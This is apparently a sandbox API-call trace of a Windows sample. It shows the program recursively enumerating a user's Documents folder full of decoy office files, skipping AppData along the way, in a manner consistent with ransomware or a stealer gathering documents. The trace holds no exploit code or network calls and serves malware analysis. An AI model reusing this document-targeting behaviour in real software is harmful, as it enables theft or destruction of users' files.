ftLastAccessTime.dwHighDateTime=0x1d5b5f6, ftLastWriteTime.dwLowDateTime=0x9d824440, ftLastWriteTime.dwHighDateTime=0x1d5b5f6, nFileSizeHigh=0x0, nFileSizeLow=0x12571, dwReserved0=0x4, dwReserved1=0x777648, cFileName="2KU7thE4LQT.xls", cAlternateFileName="2KU7TH~1.XLS")) returned 1 [0028.969] FindNextFileW (in: hFindFile=0x7c25c0, lpFindFileData=0x6ad460 | out: lpFindFileData=0x6ad460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ed46980, ftCreationTime.dwHighDateTime=0x1d5c51a, ftLastAccessTime.dwLowDateTime=0xcdb1bcd0, ftLastAccessTime.dwHighDateTime=0x1d5b728, ftLastWriteTime.dwLowDateTime=0xcdb1bcd0, ftLastWriteTime.dwHighDateTime=0x1d5b728, nFileSizeHigh=0x0, nFileSizeLow=0x9fdd, dwReserved0=0x10, dwReserved1=0x777648, cFileName="6yMffX90.rtf", cAlternateFileName="")) returned 1 [0028.969] FindNextFileW (in: hFindFile=0x7c25c0, lpFindFileData=0x6ad460 | out: lpFindFileData=0x6ad460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b364200, ftCreationTime.dwHighDateTime=0x1d5c063, ftLastAccessTime.dwLowDateTime=0x8e9b3a70, ftLastAccessTime.dwHighDateTime=0x1d5bff8, ftLastWriteTime.dwLowDateTime=0x8e9b3a70, ftLastWriteTime.dwHighDateTime=0x1d5bff8, nFileSizeHigh=0x0, nFileSizeLow=0x158e5, dwReserved0=0x10, dwReserved1=0x777648, cFileName="NC9n Uj.csv", cAlternateFileName="NC9NUJ~1.CSV")) returned 1 [0028.969] FindNextFileW (in: hFindFile=0x7c25c0, lpFindFileData=0x6ad460 | out: lpFindFileData=0x6ad460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f3cdfa0, ftCreationTime.dwHighDateTime=0x1d5bc03, ftLastAccessTime.dwLowDateTime=0xc3020f10, ftLastAccessTime.dwHighDateTime=0x1d5b8ae, ftLastWriteTime.dwLowDateTime=0xc3020f10, ftLastWriteTime.dwHighDateTime=0x1d5b8ae, nFileSizeHigh=0x0, nFileSizeLow=0x796e, dwReserved0=0x10, dwReserved1=0x777648, cFileName="OY9QR-E1TerUi8X.pdf", cAlternateFileName="OY9QR-~1.PDF")) returned 1 [0028.969] FindNextFileW (in: hFindFile=0x7c25c0, lpFindFileData=0x6ad460 | out: lpFindFileData=0x6ad460*(dwFileAttributes=0x1fa0002, ftCreationTime.dwLowDateTime=0x36b8bd, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0x21, ftLastWriteTime.dwHighDateTime=0x1f00003, nFileSizeHigh=0x36b8bd, nFileSizeLow=0x7c2020, dwReserved0=0x10, dwReserved1=0x777648, cFileName="OY\x08", cAlternateFileName="⟰{횴jဓĩ\x10")) returned 0 [0028.969] FindClose (in: hFindFile=0x7c25c0 | out: hFindFile=0x7c25c0) returned 1 [0028.970] FindNextFileW (in: hFindFile=0x7c2500, lpFindFileData=0x6ad6b8 | out: lpFindFileData=0x6ad6b8*(dwFileAttributes=0x1dc0013, ftCreationTime.dwLowDateTime=0x36b8d5, ftCreationTime.dwHighDateTime=0x777648, ftLastAccessTime.dwLowDateTime=0x36b8c0, ftLastAccessTime.dwHighDateTime=0x8, ftLastWriteTime.dwLowDateTime=0x1336310, ftLastWriteTime.dwHighDateTime=0x1de0014, nFileSizeHigh=0x36b8d5, nFileSizeLow=0x777338, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="盈w\x08", cAlternateFileName="▘{?jဓĩ\x10")) returned 0 [0028.970] FindClose (in: hFindFile=0x7c2500 | out: hFindFile=0x7c2500) returned 1 [0028.970] FindNextFileW (in: hFindFile=0x7c2440, lpFindFileData=0x6ad910 | out: lpFindFileData=0x6ad910*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ce4aaa0, ftCreationTime.dwHighDateTime=0x1d5ba70, ftLastAccessTime.dwLowDateTime=0xf3cf07c0, ftLastAccessTime.dwHighDateTime=0x1d5be20, ftLastWriteTime.dwLowDateTime=0xf3cf07c0, ftLastWriteTime.dwHighDateTime=0x1d5be20, nFileSizeHigh=0x0, nFileSizeLow=0x4284, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="MTGgV.rtf", cAlternateFileName="")) returned 1 [0028.970] FindNextFileW (in: hFindFile=0x7c2440, lpFindFileData=0x6ad910 | out: lpFindFileData=0x6ad910*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60851e90, ftCreationTime.dwHighDateTime=0x1d5b87c, ftLastAccessTime.dwLowDateTime=0x71cbc50, ftLastAccessTime.dwHighDateTime=0x1d5b8db, ftLastWriteTime.dwLowDateTime=0x71cbc50, ftLastWriteTime.dwHighDateTime=0x1d5b8db, nFileSizeHigh=0x0, nFileSizeLow=0x811, dwReserved0=0x10, dwReserved1=0x777648, cFileName="sheho1.xlsx", cAlternateFileName="SHEHO1~1.XLS")) returned 1 [0028.970] FindNextFileW (in: hFindFile=0x7c2440, lpFindFileData=0x6ad910 | out: lpFindFileData=0x6ad910*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d177b70, ftCreationTime.dwHighDateTime=0x1d5b5f8, ftLastAccessTime.dwLowDateTime=0x3287bd80, ftLastAccessTime.dwHighDateTime=0x1d5c359, ftLastWriteTime.dwLowDateTime=0x3287bd80, ftLastWriteTime.dwHighDateTime=0x1d5c359, nFileSizeHigh=0x0, nFileSizeLow=0x373c, dwReserved0=0x10, dwReserved1=0x777648, cFileName="s_Uc9.pdf", cAlternateFileName="")) returned 1 [0028.970] FindNextFileW (in: hFindFile=0x7c2440, lpFindFileData=0x6ad910 | out: lpFindFileData=0x6ad910*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bbdb0e0, ftCreationTime.dwHighDateTime=0x1d5c475, ftLastAccessTime.dwLowDateTime=0x8e00b970, ftLastAccessTime.dwHighDateTime=0x1d5bb69, ftLastWriteTime.dwLowDateTime=0x8e00b970, ftLastWriteTime.dwHighDateTime=0x1d5bb69, nFileSizeHigh=0x0, nFileSizeLow=0x13eda, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Vp6FryQ8WD7hsRBCHZV.ppt", cAlternateFileName="VP6FRY~1.PPT")) returned 1 [0028.970] FindNextFileW (in: hFindFile=0x7c2440, lpFindFileData=0x6ad910 | out: lpFindFileData=0x6ad910*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x720f9900, ftCreationTime.dwHighDateTime=0x1d5b74c, ftLastAccessTime.dwLowDateTime=0x415d5310, ftLastAccessTime.dwHighDateTime=0x1d5bb84, ftLastWriteTime.dwLowDateTime=0x415d5310, ftLastWriteTime.dwHighDateTime=0x1d5bb84, nFileSizeHigh=0x0, nFileSizeLow=0xaafb, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="YjePcpmZ.docx", cAlternateFileName="YJEPCP~1.DOC")) returned 1 [0028.970] FindNextFileW (in: hFindFile=0x7c2440, lpFindFileData=0x6ad910 | out: lpFindFileData=0x6ad910*(dwFileAttributes=0x1b60024, ftCreationTime.dwLowDateTime=0x36b92e, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x19e0025, nFileSizeHigh=0x36b92e, nFileSizeLow=0x88a4c8, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Yj\x08", cAlternateFileName="⍀{?jဓĩ\x10")) returned 0 [0028.970] FindClose (in: hFindFile=0x7c2440 | out: hFindFile=0x7c2440) returned 1 [0028.970] FindNextFileW (in: hFindFile=0x7c2380, lpFindFileData=0x6adb68 | out: lpFindFileData=0x6adb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x185fd7a0, ftCreationTime.dwHighDateTime=0x1d5b5b5, ftLastAccessTime.dwLowDateTime=0xd039be70, ftLastAccessTime.dwHighDateTime=0x1d5b7b0, ftLastWriteTime.dwLowDateTime=0xd039be70, ftLastWriteTime.dwHighDateTime=0x1d5b7b0, nFileSizeHigh=0x0, nFileSizeLow=0x14528, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="p_Vq.pdf", cAlternateFileName="")) returned 1 [0028.970] FindNextFileW (in: hFindFile=0x7c2380, lpFindFileData=0x6adb68 | out: lpFindFileData=0x6adb68*(dwFileAttributes=0x1900035, ftCreationTime.dwLowDateTime=0x36b953, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0x17, ftLastWriteTime.dwHighDateTime=0x1840036, nFileSizeHigh=0x36b953, nFileSizeLow=0x7c2020, dwReserved0=0x10, dwReserved1=0x777648, cFileName="p_\x08", cAlternateFileName="⋰{?jဓĩ\x10")) returned 0 [0028.970] FindClose (in: hFindFile=0x7c2380 | out: hFindFile=0x7c2380) returned 1 [0028.970] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe9d91460, ftCreationTime.dwHighDateTime=0x1d5bdf6, ftLastAccessTime.dwLowDateTime=0x1cc244e0, ftLastAccessTime.dwHighDateTime=0x1d5c0cd, ftLastWriteTime.dwLowDateTime=0x1cc244e0, ftLastWriteTime.dwHighDateTime=0x1d5c0cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="jrHG4BBW8X", cAlternateFileName="JRHG4B~1")) returned 1 [0028.981] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0028.981] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\*", lpFindFileData=0x6adb80 | out: lpFindFileData=0x6adb80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe9d91460, ftCreationTime.dwHighDateTime=0x1d5bdf6, ftLastAccessTime.dwLowDateTime=0x1cc244e0, ftLastAccessTime.dwHighDateTime=0x1d5c0cd, ftLastWriteTime.dwLowDateTime=0x1cc244e0, ftLastWriteTime.dwHighDateTime=0x1d5c0cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x88f100, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2380 [0028.981] FindNextFileW (in: hFindFile=0x7c2380, lpFindFileData=0x6adb80 | out: lpFindFileData=0x6adb80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe9d91460, ftCreationTime.dwHighDateTime=0x1d5bdf6, ftLastAccessTime.dwLowDateTime=0x1cc244e0, ftLastAccessTime.dwHighDateTime=0x1d5c0cd, ftLastWriteTime.dwLowDateTime=0x1cc244e0, ftLastWriteTime.dwHighDateTime=0x1d5c0cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x88f100, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0028.981] FindNextFileW (in: hFindFile=0x7c2380, lpFindFileData=0x6adb80 | out: lpFindFileData=0x6adb80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x615d42b0, ftCreationTime.dwHighDateTime=0x1d5c5fc, ftLastAccessTime.dwLowDateTime=0xb484a880, ftLastAccessTime.dwHighDateTime=0x1d5bad9, ftLastWriteTime.dwLowDateTime=0xb484a880, ftLastWriteTime.dwHighDateTime=0x1d5bad9, nFileSizeHigh=0x0, nFileSizeLow=0x106e8, dwReserved0=0x88f100, dwReserved1=0x777648, cFileName="146Rtg30PAl-LzIM9L_.ppt", cAlternateFileName="146RTG~1.PPT")) returned 1 [0028.981] FindNextFileW (in: hFindFile=0x7c2380, lpFindFileData=0x6adb68 | out: lpFindFileData=0x6adb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cd66a20, ftCreationTime.dwHighDateTime=0x1d5c3a8, ftLastAccessTime.dwLowDateTime=0xa69c42f0, ftLastAccessTime.dwHighDateTime=0x1d5bc28, ftLastWriteTime.dwLowDateTime=0xa69c42f0, ftLastWriteTime.dwHighDateTime=0x1d5bc28, nFileSizeHigh=0x0, nFileSizeLow=0x3a10, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="3p0Co4O-wsRFvd3SaeI.pdf", cAlternateFileName="3P0CO4~1.PDF")) returned 1 [0028.981] FindNextFileW (in: hFindFile=0x7c2380, lpFindFileData=0x6adb68 | out: lpFindFileData=0x6adb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b952d20, ftCreationTime.dwHighDateTime=0x1d5c04a, ftLastAccessTime.dwLowDateTime=0x545d4c30, ftLastAccessTime.dwHighDateTime=0x1d5c5e9, ftLastWriteTime.dwLowDateTime=0x545d4c30, ftLastWriteTime.dwHighDateTime=0x1d5c5e9, nFileSizeHigh=0x0, nFileSizeLow=0x17325, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="LCKIcVhsNU_6Z.pdf", cAlternateFileName="LCKICV~1.PDF")) returned 1 [0028.981] FindNextFileW (in: hFindFile=0x7c2380, lpFindFileData=0x6adb68 | out: lpFindFileData=0x6adb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x573040a0, ftCreationTime.dwHighDateTime=0x1d5b5f6, ftLastAccessTime.dwLowDateTime=0xcc4266d0, ftLastAccessTime.dwHighDateTime=0x1d5c388, ftLastWriteTime.dwLowDateTime=0xcc4266d0, ftLastWriteTime.dwHighDateTime=0x1d5c388, nFileSizeHigh=0x0, nFileSizeLow=0x16907, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Ol52nfGJKPYhFqmJCtG.ots", cAlternateFileName="OL52NF~1.OTS")) returned 1 [0028.981] FindNextFileW (in: hFindFile=0x7c2380, lpFindFileData=0x6adb68 | out: lpFindFileData=0x6adb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4208cb0, ftCreationTime.dwHighDateTime=0x1d5c2e7, ftLastAccessTime.dwLowDateTime=0xa51234c0, ftLastAccessTime.dwHighDateTime=0x1d5c200, ftLastWriteTime.dwLowDateTime=0xa51234c0, ftLastWriteTime.dwHighDateTime=0x1d5c200, nFileSizeHigh=0x0, nFileSizeLow=0x5920, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="ulG-P8FTHS2s.docx", cAlternateFileName="ULG-P8~1.DOC")) returned 1 [0028.981] FindNextFileW (in: hFindFile=0x7c2380, lpFindFileData=0x6adb68 | out: lpFindFileData=0x6adb68*(dwFileAttributes=0x1840035, ftCreationTime.dwLowDateTime=0x36b9c3, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x1740036, nFileSizeHigh=0x36b9c3, nFileSizeLow=0x88a348, dwReserved0=0x10, dwReserved1=0x777648, cFileName="ul\x08", cAlternateFileName="⋰{?jဓĩ\x10")) returned 0 [0028.981] FindClose (in: hFindFile=0x7c2380 | out: hFindFile=0x7c2380) returned 1 [0028.981] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x697d97e0, ftCreationTime.dwHighDateTime=0x1d5b721, ftLastAccessTime.dwLowDateTime=0xa3192220, ftLastAccessTime.dwHighDateTime=0x1d5bf06, ftLastWriteTime.dwLowDateTime=0xa3192220, ftLastWriteTime.dwHighDateTime=0x1d5bf06, nFileSizeHigh=0x0, nFileSizeLow=0x5068, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="oY6qw7y-W3iuu.doc", cAlternateFileName="OY6QW7~1.DOC")) returned 1 [0028.981] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4ae5b40, ftCreationTime.dwHighDateTime=0x1d5c11a, ftLastAccessTime.dwLowDateTime=0xaaf7b9b0, ftLastAccessTime.dwHighDateTime=0x1d5c47f, ftLastWriteTime.dwLowDateTime=0xaaf7b9b0, ftLastWriteTime.dwHighDateTime=0x1d5c47f, nFileSizeHigh=0x0, nFileSizeLow=0x2926, dwReserved0=0x10, dwReserved1=0x777648, cFileName="sm D80ZGiF.doc", cAlternateFileName="SMD80Z~1.DOC")) returned 1 [0028.981] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd295210, ftCreationTime.dwHighDateTime=0x1d5bf96, ftLastAccessTime.dwLowDateTime=0x57e65cb0, ftLastAccessTime.dwHighDateTime=0x1d5bdb6, ftLastWriteTime.dwLowDateTime=0x57e65cb0, ftLastWriteTime.dwHighDateTime=0x1d5bdb6, nFileSizeHigh=0x0, nFileSizeLow=0x1276b, dwReserved0=0x10, dwReserved1=0x777648, cFileName="XjUfY.rtf", cAlternateFileName="")) returned 1 [0028.982] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x1720046, ftCreationTime.dwLowDateTime=0x36ba02, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0x15, ftLastWriteTime.dwHighDateTime=0x1500047, nFileSizeHigh=0x36ba02, nFileSizeLow=0x7c2020, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Xj\x08", cAlternateFileName="⃀{jဓĩ\x10")) returned 0 [0028.982] FindClose (in: hFindFile=0x7c22c0 | out: hFindFile=0x7c22c0) returned 1 [0028.982] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb8168a0, ftCreationTime.dwHighDateTime=0x1d5bd8c, ftLastAccessTime.dwLowDateTime=0xdad62e60, ftLastAccessTime.dwHighDateTime=0x1d5bce5, ftLastWriteTime.dwLowDateTime=0xdad62e60, ftLastWriteTime.dwHighDateTime=0x1d5bce5, nFileSizeHigh=0x0, nFileSizeLow=0x14cd6, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="8Yj2_lqSAK_Ho8rx.odp", cAlternateFileName="8YJ2_L~1.ODP")) returned 1 [0028.982] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3583e280, ftCreationTime.dwHighDateTime=0x1d5b750, ftLastAccessTime.dwLowDateTime=0x36c3c50, ftLastAccessTime.dwHighDateTime=0x1d5bf0e, ftLastWriteTime.dwLowDateTime=0x36c3c50, ftLastWriteTime.dwHighDateTime=0x1d5bf0e, nFileSizeHigh=0x0, nFileSizeLow=0x162af, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="d4Y-2lNU.pps", cAlternateFileName="")) returned 1 [0028.982] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x535c5c40, ftCreationTime.dwHighDateTime=0x1d5bf6d, ftLastAccessTime.dwLowDateTime=0xf2c4c3b0, ftLastAccessTime.dwHighDateTime=0x1d5c573, ftLastWriteTime.dwLowDateTime=0xf2c4c3b0, ftLastWriteTime.dwHighDateTime=0x1d5c573, nFileSizeHigh=0x0, nFileSizeLow=0x7df0, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="JIof8cjEeKxRyV.pptx", cAlternateFileName="JIOF8C~1.PPT")) returned 1 [0028.982] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83fd62e0, ftCreationTime.dwHighDateTime=0x1d5be50, ftLastAccessTime.dwLowDateTime=0xd5dc2a40, ftLastAccessTime.dwHighDateTime=0x1d5beed, ftLastWriteTime.dwLowDateTime=0xd5dc2a40, ftLastWriteTime.dwHighDateTime=0x1d5beed, nFileSizeHigh=0x0, nFileSizeLow=0xcab3, dwReserved0=0x10, dwReserved1=0x777648, cFileName="N-yzi.pptx", cAlternateFileName="N-YZI~1.PPT")) returned 1 [0028.982] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x447c1820, ftCreationTime.dwHighDateTime=0x1d5bfca, ftLastAccessTime.dwLowDateTime=0x8ed2db60, ftLastAccessTime.dwHighDateTime=0x1d5c19c, ftLastWriteTime.dwLowDateTime=0x8ed2db60, ftLastWriteTime.dwHighDateTime=0x1d5c19c, nFileSizeHigh=0x0, nFileSizeLow=0x1c01, dwReserved0=0x10, dwReserved1=0x777648, cFileName="PM4N5-.csv", cAlternateFileName="")) returned 1 [0028.982] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aaf83f0, ftCreationTime.dwHighDateTime=0x1d5c162, ftLastAccessTime.dwLowDateTime=0x100688a0, ftLastAccessTime.dwHighDateTime=0x1d5c402, ftLastWriteTime.dwLowDateTime=0x100688a0, ftLastWriteTime.dwHighDateTime=0x1d5c402, nFileSizeHigh=0x0, nFileSizeLow=0xd05e, dwReserved0=0x10, dwReserved1=0x777648, cFileName="sZLYM.pptx", cAlternateFileName="SZLYM~1.PPT")) returned 1 [0028.986] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x14a0057, ftCreationTime.dwLowDateTime=0x36ba68, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x14e0058, nFileSizeHigh=0x36ba68, nFileSizeLow=0x889f28, dwReserved0=0x10, dwReserved1=0x777648, cFileName="sZ\x08", cAlternateFileName="ᲈ{jဓĩ\x10")) returned 0 [0028.986] FindClose (in: hFindFile=0x7c2200 | out: hFindFile=0x7c2200) returned 1 [0028.986] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb755f130, ftCreationTime.dwHighDateTime=0x1d59f5f, ftLastAccessTime.dwLowDateTime=0x17f12a10, ftLastAccessTime.dwHighDateTime=0x1d53a60, ftLastWriteTime.dwLowDateTime=0x17f12a10, ftLastWriteTime.dwHighDateTime=0x1d53a60, nFileSizeHigh=0x0, nFileSizeLow=0x15d56, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="MTos9HWEpFvwpo.pptx", cAlternateFileName="MTOS9H~1.PPT")) returned 1 [0028.986] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x777648, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0028.986] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0028.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Music", cchCount1=8, lpString2="AppData", cchCount2=7) returned 3 [0028.986] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0028.986] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x7734e0d2, ftCreationTime.dwLowDateTime=0x88a060, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x889a86, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xa1601f8, nFileSizeHigh=0x33c0f0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="", cAlternateFileName="ᲈ{jဓĩ\x10")) returned 0xffffffff [0028.987] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x777648, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0028.987] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0028.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Pictures", cchCount1=11, lpString2="AppData", cchCount2=7) returned 3 [0028.987] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0028.987] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x7734e0d2, ftCreationTime.dwLowDateTime=0x88a0c0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x889a86, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xa1601f8, nFileSizeHigh=0x33c119, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="", cAlternateFileName="ᲈ{jဓĩ\x10")) returned 0xffffffff [0028.987] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6ae53c, dwReserved1=0x777648, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0028.987] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0028.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Shapes", cchCount1=9, lpString2="AppData", cchCount2=7) returned 3 [0028.987] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0028.987] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2200 [0028.993] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, 